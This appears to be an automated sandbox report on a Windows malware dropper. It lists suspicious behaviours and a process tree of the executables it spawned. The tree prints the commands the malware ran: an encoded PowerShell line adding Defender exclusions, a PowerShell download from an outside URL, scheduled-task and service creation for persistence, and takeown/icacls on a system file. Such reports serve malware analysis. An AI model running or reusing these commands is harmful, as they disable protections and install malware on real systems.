Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | eagleget-2-1-6-50.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | eagleget-2-1-6-50.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data omitted] | eagleget-2-1-6-50.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup.exe, win1.exe, MsBuild.exe, comp.exe, output.exe, AcroRd32.exe, FUT.au3, svcshost.exe, powershell.exe, powershell.exe, print.exe, updater.exe
pid | process
6532 | Setup.exe (×3)
4392 | win1.exe (×5)
6520 | MsBuild.exe (×2)
5964 | comp.exe (×4)
2360 | output.exe (×2)
6732 | AcroRd32.exe (×20)
5608 | FUT.au3 (×2)
3272 | svcshost.exe (×2)
5560 | powershell.exe (×3)
7488 | powershell.exe (×3)
3272 | svcshost.exe (×7)
7136 | print.exe (×8)
7184 | updater.exe (×3)
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Setup.exe, comp.exe
pid | process
6532 | Setup.exe
5964 | comp.exe
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
syslmgrsvc.exe
pid | process
7484 | syslmgrsvc.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
New Text Document mod.exe, AntiVirus2.exe, svchost.exe, MsBuild.exe, win1.exe, alabi.exe, csc.exe, takeown.exe, SearchIndexer.exe, 7z.exe, 7z.exe, 7z.exe, svcshost.exe, powershell.exe, powershell.exe, taskkill.exe, 7z.exe, 7z.exe
description | pid | process
Token: SeDebugPrivilege | 1388 | New Text Document mod.exe
Token: SeDebugPrivilege | 4304 | AntiVirus2.exe
Token: SeDebugPrivilege | 6100 | svchost.exe
Token: SeDebugPrivilege | 6520 | MsBuild.exe
Token: SeBackupPrivilege | 6520 | MsBuild.exe
Token: SeSecurityPrivilege | 6520 | MsBuild.exe (×4)
Token: SeDebugPrivilege | 4392 | win1.exe
Token: SeDebugPrivilege | 6100 | svchost.exe
Token: SeDebugPrivilege | 6476 | alabi.exe
Token: SeDebugPrivilege | 6928 | csc.exe
Token: SeTakeOwnershipPrivilege | 6332 | takeown.exe
Token: 33 | 756 | SearchIndexer.exe
Token: SeIncBasePriorityPrivilege | 756 | SearchIndexer.exe
Token: SeTakeOwnershipPrivilege | 756 | SearchIndexer.exe (×24)
Token: SeRestorePrivilege | 5136 | 7z.exe
Token: 35 | 5136 | 7z.exe
Token: SeSecurityPrivilege | 5136 | 7z.exe (×2)
Token: SeRestorePrivilege | 6800 | 7z.exe
Token: 35 | 6800 | 7z.exe
Token: SeSecurityPrivilege | 6800 | 7z.exe (×2)
Token: SeRestorePrivilege | 6668 | 7z.exe
Token: 35 | 6668 | 7z.exe
Token: SeSecurityPrivilege | 6668 | 7z.exe (×2)
Token: SeDebugPrivilege | 3272 | svcshost.exe
Token: SeDebugPrivilege | 5560 | powershell.exe
Token: SeDebugPrivilege | 7488 | powershell.exe
Token: SeDebugPrivilege | 7048 | taskkill.exe
Token: SeRestorePrivilege | 2556 | 7z.exe
Token: 35 | 2556 | 7z.exe
Token: SeSecurityPrivilege | 2556 | 7z.exe (×2)
Token: SeRestorePrivilege | 7756 | 7z.exe
Token: 35 | 7756 | 7z.exe
Token: SeSecurityPrivilege | 7756 | 7z.exe (×2)
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
AcroRd32.exe, crt.tmp, Client.exe
pid | process
6732 | AcroRd32.exe
6896 | crt.tmp
1680 | Client.exe
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Client.exe
pid | process
1680 | Client.exe
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
win1.exe, AcroRd32.exe
pid | process
4392 | win1.exe
6732 | AcroRd32.exe (×5)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New Text Document mod.exe, xin.exe, Setup.exe, output.exe, crt.exe, comp.exe, AcroRd32.exe, crt.tmp, RdrCEF.exe
description | pid | process | target process
PID 1388 wrote to memory of 4436 | 1388 | New Text Document mod.exe | xin.exe (×3)
PID 1388 wrote to memory of 3256 | 1388 | New Text Document mod.exe | eagleget-2-1-6-50.exe (×2)
PID 1388 wrote to memory of 4304 | 1388 | New Text Document mod.exe | AntiVirus2.exe (×3)
PID 4436 wrote to memory of 6520 | 4436 | xin.exe | MsBuild.exe (×8)
PID 1388 wrote to memory of 6532 | 1388 | New Text Document mod.exe | Setup.exe (×3)
PID 1388 wrote to memory of 6100 | 1388 | New Text Document mod.exe | svchost.exe (×2)
PID 1388 wrote to memory of 4392 | 1388 | New Text Document mod.exe | win1.exe (×2)
PID 6532 wrote to memory of 5964 | 6532 | Setup.exe | comp.exe (×4)
PID 1388 wrote to memory of 2360 | 1388 | New Text Document mod.exe | output.exe (×3)
PID 2360 wrote to memory of 6732 | 2360 | output.exe | AcroRd32.exe (×3)
PID 2360 wrote to memory of 5488 | 2360 | output.exe | SIG.EXE (×3)
PID 1388 wrote to memory of 6476 | 1388 | New Text Document mod.exe | alabi.exe (×3)
PID 1388 wrote to memory of 5168 | 1388 | New Text Document mod.exe | crt.exe (×3)
PID 5168 wrote to memory of 6896 | 5168 | crt.exe | crt.tmp (×3)
PID 5964 wrote to memory of 5608 | 5964 | comp.exe | FUT.au3 (×3)
PID 6732 wrote to memory of 5556 | 6732 | AcroRd32.exe | RdrCEF.exe (×3)
PID 6896 wrote to memory of 5500 | 6896 | crt.tmp | soundermidiplayer.exe (×3)
PID 6896 wrote to memory of 3456 | 6896 | crt.tmp | soundermidiplayer.exe (×3)
PID 5964 wrote to memory of 5608 | 5964 | comp.exe | FUT.au3 (×2)
PID 6732 wrote to memory of 7092 | 6732 | AcroRd32.exe | RdrCEF.exe (×3)
PID 5556 wrote to memory of 7324 | 5556 | RdrCEF.exe | RdrCEF.exe (×2)
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exe, attrib.exe
pid | process
1804 | attrib.exe
7580 | attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388
C:\Users\Admin\AppData\Local\Temp\a\xin.exe"C:\Users\Admin\AppData\Local\Temp\a\xin.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4436
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6520
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 2523⤵
- Program crash
PID:5324
C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3256
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:6532
C:\Windows\SysWOW64\comp.exeC:\Windows\SysWOW64\comp.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5964
C:\Users\Admin\AppData\Local\Temp\FUT.au3C:\Users\Admin\AppData\Local\Temp\FUT.au34⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5608
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100
C:\Users\Admin\AppData\Local\Temp\a\win1.exe"C:\Users\Admin\AppData\Local\Temp\a\win1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4392
C:\Users\Admin\AppData\Local\Temp\a\output.exe"C:\Users\Admin\AppData\Local\Temp\a\output.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:6732
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:5556
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E5444D30E377EB2AE4F120435E836C99 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode 
--service-request-channel-token=E5444D30E377EB2AE4F120435E836C99 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:15⤵PID:7324
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2DF0931F21BBCF253B341D049C31069C --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:7388
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EAF574A66DCB6520AA0E40C899D27978 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1052
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode 
--service-request-channel-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --renderer-client-id=5 --mojo-platform-channel-handle=1976 --allow-no-sandbox-job /prefetch:15⤵PID:3964
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4163D7B377DB2D1829A4E47DA9E53303 --mojo-platform-channel-handle=2816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3376
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D105695014EB621DAFEE8EE305A1E38F --mojo-platform-channel-handle=1988 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:6608
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:7092
C:\Users\Admin\AppData\Local\Temp\SIG.EXE"C:\Users\Admin\AppData\Local\Temp\SIG.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5488
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6928
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6476
C:\Users\Admin\AppData\Local\Temp\a\crt.exe"C:\Users\Admin\AppData\Local\Temp\a\crt.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5168
C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp"C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp" /SL5="$10260,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:6896
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i4⤵
- Executes dropped EXE
PID:5500
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s4⤵
- Executes dropped EXE
PID:3456
C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:860
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F3⤵PID:7440
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6332
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6156
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own3⤵PID:7928
C:\Windows\system32\sc.exesc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own4⤵
- Launches sc.exe
PID:4384
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "3⤵PID:4980
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:7108
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6316
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵PID:4424
C:\Windows\system32\mode.commode 65,104⤵PID:6604
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p563741341569714296105326100 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5136
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6800
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6668
C:\Windows\system32\attrib.exeattrib +H "svcshost.exe"4⤵
- Views/modifies file attributes
PID:1804
C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe"svcshost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵PID:2432
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA=="6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5560
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:4712
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:3008
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:5816
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6644
C:\Users\Admin\AppData\Local\Temp\katD433.tmpC:\Users\Admin\AppData\Local\Temp\katD433.tmp3⤵
- Executes dropped EXE
PID:7472
C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3776
C:\Users\Admin\AppData\Local\Temp\katDA1F.tmpC:\Users\Admin\AppData\Local\Temp\katDA1F.tmp3⤵
- Executes dropped EXE
PID:2248
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5268
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit3⤵PID:4376
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7048
C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5328
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nseDB3A.tmp\abc.bat"3⤵PID:7608
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7488
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:4568
C:\Windows\sysblardsv.exeC:\Windows\sysblardsv.exe3⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:368
C:\Users\Admin\AppData\Local\Temp\270914205.exeC:\Users\Admin\AppData\Local\Temp\270914205.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6772
C:\Windows\syslmgrsvc.exeC:\Windows\syslmgrsvc.exe5⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:7484
C:\Users\Admin\AppData\Local\Temp\744220930.exeC:\Users\Admin\AppData\Local\Temp\744220930.exe6⤵
- Executes dropped EXE
PID:3328
